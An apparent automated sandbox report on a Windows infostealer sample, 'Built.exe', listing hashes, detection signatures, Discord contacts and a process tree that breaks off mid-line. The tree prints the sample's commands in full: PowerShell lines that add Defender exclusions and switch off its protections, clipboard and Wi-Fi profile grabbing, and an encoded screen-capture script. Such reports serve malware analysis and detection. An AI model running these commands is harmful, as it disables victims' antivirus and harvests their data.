Analysis
-
max time kernel
140s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-11-2024 12:49
Behavioral task
behavioral1
Sample
Built.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Built.exe
Resource
win10v2004-20241007-en
General
-
Target
Built.exe
-
Size
6.9MB
-
MD5
6854efe5c9effa0861b8c3550cced272
-
SHA1
8bd2f32951f9fc761895b05c01819d0e2e144e05
-
SHA256
f1436b3969e216ee894febc0d11a4d9da83c61d8a75599e18c236b122d514fe7
-
SHA512
f1e8eaff65ff28459fc5091d593806207dab06f0208586c69c7abd9e34d0575a49a3a85639e0891b29610eff516aa1aa8e2140db2b2c5edb0b1f9c4275f6acf5
-
SSDEEP
98304:2VpTDjWM8JEE1FhamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhEIx:UT0yeNTfm/pf+xk4dWRpmrbW3jmrT
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 212 powershell.exe 364 powershell.exe 4552 powershell.exe 2144 powershell.exe 64 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2172 cmd.exe 960 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4524 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe 888 Built.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 29 discord.com 30 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3484 tasklist.exe 3580 tasklist.exe 4996 tasklist.exe 1444 tasklist.exe -
resource yara_rule behavioral2/files/0x000a000000023b99-21.dat upx behavioral2/memory/888-25-0x00007FFA743E0000-0x00007FFA749C8000-memory.dmp upx behavioral2/files/0x000a000000023b8c-27.dat upx behavioral2/files/0x000a000000023b97-31.dat upx behavioral2/memory/888-48-0x00007FFA875F0000-0x00007FFA875FF000-memory.dmp upx behavioral2/files/0x000a000000023b91-45.dat upx behavioral2/files/0x000a000000023b90-44.dat upx behavioral2/files/0x000a000000023b8f-43.dat upx behavioral2/files/0x000a000000023b9e-39.dat upx behavioral2/files/0x000a000000023b9d-38.dat upx behavioral2/files/0x000a000000023b9c-37.dat upx behavioral2/files/0x000a000000023b96-33.dat upx behavioral2/files/0x000a000000023b93-47.dat upx behavioral2/files/0x000a000000023b92-46.dat upx behavioral2/files/0x000a000000023b8e-42.dat upx behavioral2/files/0x000a000000023b8d-41.dat upx behavioral2/files/0x000a000000023b8b-40.dat upx behavioral2/files/0x000a000000023b98-34.dat upx behavioral2/memory/888-30-0x00007FFA87570000-0x00007FFA87594000-memory.dmp upx behavioral2/memory/888-54-0x00007FFA86EF0000-0x00007FFA86F1D000-memory.dmp upx behavioral2/memory/888-56-0x00007FFA86ED0000-0x00007FFA86EE9000-memory.dmp upx behavioral2/memory/888-58-0x00007FFA86EA0000-0x00007FFA86EC3000-memory.dmp upx behavioral2/memory/888-60-0x00007FFA82A00000-0x00007FFA82B73000-memory.dmp upx behavioral2/memory/888-62-0x00007FFA86E80000-0x00007FFA86E99000-memory.dmp upx behavioral2/memory/888-64-0x00007FFA875E0000-0x00007FFA875ED000-memory.dmp upx behavioral2/memory/888-66-0x00007FFA832C0000-0x00007FFA832EE000-memory.dmp upx behavioral2/memory/888-68-0x00007FFA743E0000-0x00007FFA749C8000-memory.dmp upx behavioral2/memory/888-69-0x00007FFA822A0000-0x00007FFA82358000-memory.dmp upx behavioral2/memory/888-71-0x00007FFA87570000-0x00007FFA87594000-memory.dmp upx behavioral2/memory/888-73-0x00007FFA73A80000-0x00007FFA73DF5000-memory.dmp upx behavioral2/memory/888-80-0x00007FFA82F50000-0x00007FFA82F5D000-memory.dmp upx behavioral2/memory/888-79-0x00007FFA86ED0000-0x00007FFA86EE9000-memory.dmp upx behavioral2/memory/888-78-0x00007FFA83A50000-0x00007FFA83A64000-memory.dmp upx behavioral2/memory/888-76-0x00007FFA86EF0000-0x00007FFA86F1D000-memory.dmp upx behavioral2/memory/888-84-0x00007FFA86EA0000-0x00007FFA86EC3000-memory.dmp upx behavioral2/memory/888-85-0x00007FFA74100000-0x00007FFA7421C000-memory.dmp upx behavioral2/memory/888-87-0x00007FFA86E80000-0x00007FFA86E99000-memory.dmp upx behavioral2/memory/888-86-0x00007FFA82A00000-0x00007FFA82B73000-memory.dmp upx behavioral2/memory/888-184-0x00007FFA875E0000-0x00007FFA875ED000-memory.dmp upx behavioral2/memory/888-221-0x00007FFA832C0000-0x00007FFA832EE000-memory.dmp upx behavioral2/memory/888-230-0x00007FFA822A0000-0x00007FFA82358000-memory.dmp upx behavioral2/memory/888-231-0x00007FFA73A80000-0x00007FFA73DF5000-memory.dmp upx behavioral2/memory/888-326-0x00007FFA87570000-0x00007FFA87594000-memory.dmp upx behavioral2/memory/888-331-0x00007FFA82A00000-0x00007FFA82B73000-memory.dmp upx behavioral2/memory/888-340-0x00007FFA74100000-0x00007FFA7421C000-memory.dmp upx behavioral2/memory/888-325-0x00007FFA743E0000-0x00007FFA749C8000-memory.dmp upx behavioral2/memory/888-347-0x00007FFA82A00000-0x00007FFA82B73000-memory.dmp upx behavioral2/memory/888-355-0x00007FFA74100000-0x00007FFA7421C000-memory.dmp upx behavioral2/memory/888-354-0x00007FFA82F50000-0x00007FFA82F5D000-memory.dmp upx behavioral2/memory/888-353-0x00007FFA83A50000-0x00007FFA83A64000-memory.dmp upx behavioral2/memory/888-352-0x00007FFA73A80000-0x00007FFA73DF5000-memory.dmp upx behavioral2/memory/888-351-0x00007FFA822A0000-0x00007FFA82358000-memory.dmp upx behavioral2/memory/888-350-0x00007FFA832C0000-0x00007FFA832EE000-memory.dmp upx behavioral2/memory/888-349-0x00007FFA875E0000-0x00007FFA875ED000-memory.dmp upx behavioral2/memory/888-348-0x00007FFA86E80000-0x00007FFA86E99000-memory.dmp upx behavioral2/memory/888-344-0x00007FFA86EF0000-0x00007FFA86F1D000-memory.dmp upx behavioral2/memory/888-346-0x00007FFA86EA0000-0x00007FFA86EC3000-memory.dmp upx behavioral2/memory/888-345-0x00007FFA86ED0000-0x00007FFA86EE9000-memory.dmp upx behavioral2/memory/888-343-0x00007FFA875F0000-0x00007FFA875FF000-memory.dmp upx behavioral2/memory/888-342-0x00007FFA87570000-0x00007FFA87594000-memory.dmp upx behavioral2/memory/888-341-0x00007FFA743E0000-0x00007FFA749C8000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1716 cmd.exe 3068 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 376 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2920 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 212 powershell.exe 4552 powershell.exe 4552 powershell.exe 364 powershell.exe 364 powershell.exe 4552 powershell.exe 212 powershell.exe 212 powershell.exe 960 powershell.exe 960 powershell.exe 364 powershell.exe 364 powershell.exe 960 powershell.exe 4964 powershell.exe 4964 powershell.exe 4964 powershell.exe 2144 powershell.exe 2144 powershell.exe 4708 powershell.exe 4708 powershell.exe 64 powershell.exe 64 powershell.exe 64 powershell.exe 724 powershell.exe 724 powershell.exe 724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 212 powershell.exe Token: SeDebugPrivilege 4552 powershell.exe Token: SeDebugPrivilege 4996 tasklist.exe Token: SeDebugPrivilege 1444 tasklist.exe Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeIncreaseQuotaPrivilege 3580 WMIC.exe Token: SeSecurityPrivilege 3580 WMIC.exe Token: SeTakeOwnershipPrivilege 3580 WMIC.exe Token: SeLoadDriverPrivilege 3580 WMIC.exe Token: SeSystemProfilePrivilege 3580 WMIC.exe Token: SeSystemtimePrivilege 3580 WMIC.exe Token: SeProfSingleProcessPrivilege 3580 WMIC.exe Token: SeIncBasePriorityPrivilege 3580 WMIC.exe Token: SeCreatePagefilePrivilege 3580 WMIC.exe Token: SeBackupPrivilege 3580 WMIC.exe Token: SeRestorePrivilege 3580 WMIC.exe Token: SeShutdownPrivilege 3580 WMIC.exe Token: SeDebugPrivilege 3580 WMIC.exe Token: SeSystemEnvironmentPrivilege 3580 WMIC.exe Token: SeRemoteShutdownPrivilege 3580 WMIC.exe Token: SeUndockPrivilege 3580 WMIC.exe Token: SeManageVolumePrivilege 3580 WMIC.exe Token: 33 3580 WMIC.exe Token: 34 3580 WMIC.exe Token: 35 3580 WMIC.exe Token: 36 3580 WMIC.exe Token: SeDebugPrivilege 3484 tasklist.exe Token: SeIncreaseQuotaPrivilege 3580 WMIC.exe Token: SeSecurityPrivilege 3580 WMIC.exe Token: SeTakeOwnershipPrivilege 3580 WMIC.exe Token: SeLoadDriverPrivilege 3580 WMIC.exe Token: SeSystemProfilePrivilege 3580 WMIC.exe Token: SeSystemtimePrivilege 3580 WMIC.exe Token: SeProfSingleProcessPrivilege 3580 WMIC.exe Token: SeIncBasePriorityPrivilege 3580 WMIC.exe Token: SeCreatePagefilePrivilege 3580 WMIC.exe Token: SeBackupPrivilege 3580 WMIC.exe Token: SeRestorePrivilege 3580 WMIC.exe Token: SeShutdownPrivilege 3580 WMIC.exe Token: SeDebugPrivilege 3580 WMIC.exe Token: SeSystemEnvironmentPrivilege 3580 WMIC.exe Token: SeRemoteShutdownPrivilege 3580 WMIC.exe Token: SeUndockPrivilege 3580 WMIC.exe Token: SeManageVolumePrivilege 3580 WMIC.exe Token: 33 3580 WMIC.exe Token: 34 3580 WMIC.exe Token: 35 3580 WMIC.exe Token: 36 3580 WMIC.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeDebugPrivilege 3580 tasklist.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeIncreaseQuotaPrivilege 4136 WMIC.exe Token: SeSecurityPrivilege 4136 WMIC.exe Token: SeTakeOwnershipPrivilege 4136 WMIC.exe Token: SeLoadDriverPrivilege 4136 WMIC.exe Token: SeSystemProfilePrivilege 4136 WMIC.exe Token: SeSystemtimePrivilege 4136 WMIC.exe Token: SeProfSingleProcessPrivilege 4136 WMIC.exe Token: SeIncBasePriorityPrivilege 4136 WMIC.exe Token: SeCreatePagefilePrivilege 4136 WMIC.exe Token: SeBackupPrivilege 4136 WMIC.exe Token: SeRestorePrivilege 4136 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4936 wrote to memory of 888 4936 Built.exe 85 PID 4936 wrote to memory of 888 4936 Built.exe 85 PID 888 wrote to memory of 4776 888 Built.exe 89 PID 888 wrote to memory of 4776 888 Built.exe 89 PID 888 wrote to memory of 3632 888 Built.exe 91 PID 888 wrote to memory of 3632 888 Built.exe 91 PID 888 wrote to memory of 4456 888 Built.exe 93 PID 888 wrote to memory of 4456 888 Built.exe 93 PID 3632 wrote to memory of 4552 3632 cmd.exe 95 PID 3632 wrote to memory of 4552 3632 cmd.exe 95 PID 4776 wrote to memory of 212 4776 cmd.exe 96 PID 4776 wrote to memory of 212 4776 cmd.exe 96 PID 888 wrote to memory of 3816 888 Built.exe 97 PID 888 wrote to memory of 3816 888 Built.exe 97 PID 888 wrote to memory of 5012 888 Built.exe 98 PID 888 wrote to memory of 5012 888 Built.exe 98 PID 5012 wrote to memory of 4996 5012 cmd.exe 99 PID 5012 wrote to memory of 4996 5012 cmd.exe 99 PID 3816 wrote to memory of 1444 3816 cmd.exe 100 PID 3816 wrote to memory of 1444 3816 cmd.exe 100 PID 4456 wrote to memory of 364 4456 cmd.exe 101 PID 4456 wrote to memory of 364 4456 cmd.exe 101 PID 888 wrote to memory of 1192 888 Built.exe 102 PID 888 wrote to memory of 1192 888 Built.exe 102 PID 888 wrote to memory of 4392 888 Built.exe 104 PID 888 wrote to memory of 4392 888 Built.exe 104 PID 888 wrote to memory of 2172 888 Built.exe 105 PID 888 wrote to memory of 2172 888 Built.exe 105 PID 2172 wrote to memory of 960 2172 cmd.exe 106 PID 2172 wrote to memory of 960 2172 cmd.exe 106 PID 888 wrote to memory of 4312 888 Built.exe 107 PID 888 wrote to memory of 4312 888 Built.exe 107 PID 888 wrote to memory of 1716 888 Built.exe 108 PID 888 wrote to memory of 1716 888 Built.exe 108 PID 4312 wrote to memory of 3356 4312 cmd.exe 109 PID 4312 wrote to memory of 3356 4312 cmd.exe 109 PID 1192 wrote to memory of 3580 1192 cmd.exe 133 PID 1192 wrote to memory of 3580 1192 cmd.exe 133 PID 888 wrote to memory of 3196 888 Built.exe 111 PID 888 wrote to memory of 3196 888 Built.exe 111 PID 888 wrote to memory of 1912 888 Built.exe 112 PID 888 wrote to memory of 1912 888 Built.exe 112 PID 888 wrote to memory of 2848 888 Built.exe 113 PID 888 wrote to memory of 2848 888 Built.exe 113 PID 4392 wrote to memory of 3484 4392 cmd.exe 114 PID 4392 wrote to memory of 3484 4392 cmd.exe 114 PID 1716 wrote to memory of 3068 1716 cmd.exe 115 PID 1716 wrote to memory of 3068 1716 cmd.exe 115 PID 888 wrote to memory of 948 888 Built.exe 116 PID 888 wrote to memory of 948 888 Built.exe 116 PID 1912 wrote to memory of 4980 1912 cmd.exe 136 PID 1912 wrote to memory of 4980 1912 cmd.exe 136 PID 3196 wrote to memory of 2920 3196 cmd.exe 118 PID 3196 wrote to memory of 2920 3196 cmd.exe 118 PID 2848 wrote to memory of 4964 2848 cmd.exe 119 PID 2848 wrote to memory of 4964 2848 cmd.exe 119 PID 948 wrote to memory of 4344 948 cmd.exe 120 PID 948 wrote to memory of 4344 948 cmd.exe 120 PID 888 wrote to memory of 3688 888 Built.exe 121 PID 888 wrote to memory of 3688 888 Built.exe 121 PID 888 wrote to memory of 2980 888 Built.exe 122 PID 888 wrote to memory of 2980 888 Built.exe 122 PID 3688 wrote to memory of 1000 3688 cmd.exe 123 PID 3688 wrote to memory of 1000 3688 cmd.exe 123 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4256 attrib.exe 4948 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:3356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:4980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 